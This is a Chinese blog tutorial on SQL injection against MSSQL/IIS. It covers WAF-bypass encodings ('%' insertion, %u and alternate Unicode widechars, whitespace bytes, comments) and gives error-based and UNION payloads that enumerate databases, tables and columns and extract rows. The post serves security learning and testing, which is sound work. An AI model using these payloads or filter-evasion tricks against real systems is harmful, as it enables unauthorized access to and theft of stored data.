web安全学习-sql注入-针对mssql(sqlserver)的攻击

た入场券 2022-11-13 06:24 244阅读 0赞

### 文章目录 ###

*  0x00 前言
 *  0x01 mssql环境下需要了解的几个特性
 *   *  1. iis特性
     *   *  1.1 %特性(ASP+IIS)
         *  1.2 %u特性(asp+iis和aspx+iis)
         *  1.3 另类%u特性(ASP+IIS)
     *  2. mssql特性
     *   *  1. 空白字符
         *  2. 注释符
         *  3. 特殊数值
         *  4. 运算符
 *  0x02 测试过程
 *   *  0.判断数据库是否是mssql
     *  1.读取当前数据库下所有的表：
     *  2.读取所有的数据库并显示在一行
     *  3.爆指定数据库的表名
     *  4.查找某数据库中用户创建的表
     *  5. 判断回显点
     *  6. 实现limit
     *  7. 爆列名
     *  7. 爆数据
 *  0x03 自动化生成bypass\_payload脚本编写
 *  总结
 *  参考文章

# 0x00 前言 #

mssql一般的环境是iis+asp或iis+aspx，我们先了解一下mssql的特性。

--------------------

# 0x01 mssql环境下需要了解的几个特性 #

`此部分内容均为转载`

## 1. iis特性 ##

下面摘自 bypass大佬的waf攻防实战笔记

### 1.1 %特性(ASP+IIS) ###

在asp+iis的环境中存在一个特性,就是特殊符号%,在该环境下当们我输入s%elect的时候,在WAF层可能解析出来

的结果就是s%elect,但是在iis+asp的环境的时候,解析出来的结果为select。

Ps.此处猜测可能是iis下asp.dll解析时候的问题,aspx+iis的环境就没有这个特性。

### 1.2 %u特性(asp+iis和aspx+iis) ###

Iis服务器支持对于unicode的解析,例如我们对于select中的字符进行unicode编码,可以得到如下的

s%u006c%u0006ect ,这种字符在IIS接收到之后会被转换为select,但是对于WAF层,可能接收到的内容还是

s%u006c%u0006ect,这样就会形成bypass的可能。

### 1.3 另类%u特性(ASP+IIS) ###

该漏洞主要利用的是unicode在iis解析之后会被转换成multibyte,但是转换的过程中可能出现: 多个widechar会有

可能转换为同一个字符。打个比方就是譬如select中的e对应的unicode为%u0065,但是%u00f0同样会被转换成为 e。s%u0065lect->select s%u00f0lect->select WAF层可能能识别s%u0065lect的形式,但是很有可能识别不了s%u00f0lect的形式。这样就可以利用起来做WAF的 绕过。常见三个关键字(union+select+from)的测试情况:

s%u0045lect = s%u0065lect = %u00f0lect
    u --> %u0055 --> %u0075
    n -->%u004e --> %u006e
    i -->%u0049 --> %u0069
    o -->%u004f --> %u006f -->%u00ba
    s -->%u0053 --> %u0073
    l -->%u004c --> %u006c
    e -->%u0045 --> %u0065-->%u00f0
    c -->%u0043 --> %u0063
    t -->%u0054 -->%u0074 -->%u00de -->%u00fe
    f -->%u0046 -->%u0066
    r -->%u0052 -->%u0072
    m -->%u004d -->%u006d

## 2. mssql特性 ##

### 1. 空白字符 ###

Mssql可以利用的空白字符有(需要在字符前面加%):

01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

### 2. 注释符 ###

注释符可以用来代替空格,或者和–配合使用,–也可以配合%0a(注释加换行)

/**/
    --
    /*anything*/

### 3. 特殊数值 ###

一般用在注入点上

如1.1或者1E0这些

### 4. 运算符 ###

下面摘自 404大佬的[MSSQL\_SQL\_BYPASS\_WIKI][MSSQL_SQL_BYPASS_WIKI]

+   加法运算
    -   减法运算
    *   乘法运算
    /   除法运算，如果两个表达式值都是整数，那么结果只取整数值，小数值将略去
    %   取模运算，返回两数相除后的余数
    
    &   位与逻辑运算，从两个表达式中取对应的位。当且仅当输入表达式中两个位的值都为1时，结果中的位才被设置为1，否则，结果中的位被设置为0
    |   位或逻辑运算，从两个表达式中取对应的位。如果输入表达式中两个位只要有一个的值为1时，结果的位就被设置为1，只有当两个位的值都为0时，结果中的位才被设置为0
    ^   位异或运算，从两个表达式中取对应的位。如果输入表达式中两个位只有一个的值为1时，结果中的位就被设置为1；只有当两个位的值都为0或1时，结果中的位才被设置为0
    
    =   等于 
    <>  不等于
    >   大于  
    !=  不等于
    <   小于  
    !<  不小于
    >=  大于或等于   
    !>  不大于
    <=  小于或等于
    
    ALL 如果一组的比较都为true，则比较结果为true
    AND 如果两个布尔表达式都为true，则结果为true；如果其中一个表达式为false，则结果为false
    ANY 如果一组的比较中任何一个为true，则结果为true
    BETWEEN 如果操作数在某个范围之内，那么结果为true
    EXISTS  如果子查询中包含了一些行，那么结果为true
    IN  如果操作数等于表达式列表中的一个，那么结果为true
    LIKE    如果操作数与某种模式相匹配，那么结果为true
    NOT 对任何其他布尔运算符的结果值取反
    OR  如果两个布尔表达式中的任何一个为true，那么结果为true
    SOME    如果在一组比较中，有些比较为true，那么结果为true

# 0x02 测试过程 #

## 0.判断数据库是否是mssql ##

and exists (select * from sysobjects)--

## 1.读取当前数据库下所有的表： ##

select * from new123 where id = 2 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('V_XG_BZKS_SHSJHD','HH_HeartHealthRefer_Web')))

## 2.读取所有的数据库并显示在一行 ##

select * from new123 where id = 2 and 1=convert(int,(select quotename(name) from master..sysdatabases FOR XML PATH('')))

## 3.爆指定数据库的表名 ##

select * from new123 where name = ''  UNION select 1,(SELECT table_name from information_schema.tables where table_catalog=db_name()),2 --

![在这里插入图片描述][20210519121318236.png]

SELECT  quotename(table_name) from information_schema.tables where table_catalog=db_name() FOR XML PATH('')

![在这里插入图片描述][20210519124615593.png]

## 4.查找某数据库中用户创建的表 ##

`查看当前数据库中用户创建的表`

select * from sysobjects where xtype='U'

`查看master数据库中用户创建的表`

select * from master.dbo.sysobjects where xtype='U'

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]  
参考文章：[MSSQL三个关键系统表sysdatabases,sysobjects,syscolumns作用分析][MSSQL_sysdatabases_sysobjects_syscolumns]

## 5. 判断回显点 ##

跟mysql一样使用order by。

## 6. 实现limit ##

下面语句的逻辑是，查找表名，并显示除了第一个表名外的其他表名中的第一个。举例如下：  
下表本有两个表new123与test11，如果我们执行命令，那么我们知道除了第一个表名new123外其他表名中的第一个表名就是test11，则最终test11会被显示出来。如果想显示第3个表名，那么将第二个top后面的数据改为2即可。逻辑就变成了，除了前两个表名外其他表名中的第一个，以此类推。

SELECT top 1 table_name from information_schema.tables where table_catalog=db_name() and table_name not in (SELECT top 1 table_name from information_schema.tables where table_catalog=db_name())

![在这里插入图片描述][2021051912380111.png]  
![在这里插入图片描述][20210519123807961.png]

## 7. 爆列名 ##

select quotename(name) from [数据库名]..syscolumns where id =(select id from [数据库名]..sysobjects where name='table_name') FOR XML PATH('')

例如我要爆破，test数据库中new123表中的列名，一次性显示所有列名：

select quotename(name) from test..syscolumns where id =(select id from test..sysobjects where name='new123') FOR XML PATH('')

![在这里插入图片描述][20210519125550698.png]  
我们也可以一个一个显示,更改第二个top后面的数字即可，`原理在第六步实现limit中解释过了：`

select top 1 name from test..syscolumns where id =(select id from test..sysobjects where name='new123') and name not in (select top 0 name from test..syscolumns where id =(select top 1 id from test..sysobjects where name='new123'))

## 7. 爆数据 ##

一次爆出所有

select quotename(name) from new123 for xml path('')

![在这里插入图片描述][20210519130122675.png]  
一个一个爆出：

select top 1 name  from new123 where name not in (select top 1 name  from new123);

![在这里插入图片描述][20210519130239399.png]

# 0x03 自动化生成bypass\_payload脚本编写 #

# 总结 #

# 参考文章 #

[aleenzz/MSSQL\_SQL\_BYPASS\_WIKI][MSSQL_SQL_BYPASS_WIKI]  
[记一次面试bypass宝塔+安全狗的手注][bypass]  
[MSSQL手工注入总结][MSSQL]

[MSSQL_SQL_BYPASS_WIKI]: https://github.com/aleenzz/MSSQL_SQL_BYPASS_WIKI
[20210519121318236.png]: /images/20221022/2709b85264124a66b40ba47b914174e7.png
[20210519124615593.png]: /images/20221022/d0c20c58c7294174976665fb5c5dc74f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: /images/20221022/093df643a1584ec8a818c828ab2fa20e.png
[MSSQL_sysdatabases_sysobjects_syscolumns]: https://www.path8.net/tn/archives/3298
[2021051912380111.png]: /images/20221022/6d8fbe1b4a58465b8a7d89d175c491e9.png
[20210519123807961.png]: /images/20221022/928efd5fda254a928e52700ab88095f8.png
[20210519125550698.png]: /images/20221022/15723b240f454ffcbde9ba23616ce2fc.png
[20210519130122675.png]: /images/20221022/bd0f486584ee467e94d28b387d1c8b11.png
[20210519130239399.png]: /images/20221022/8a620e6def044d1eb084574ace40f24b.png
[bypass]: http://www.safe6.cn/article/218
[MSSQL]: http://www.admintony.com/MSSQL%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93.html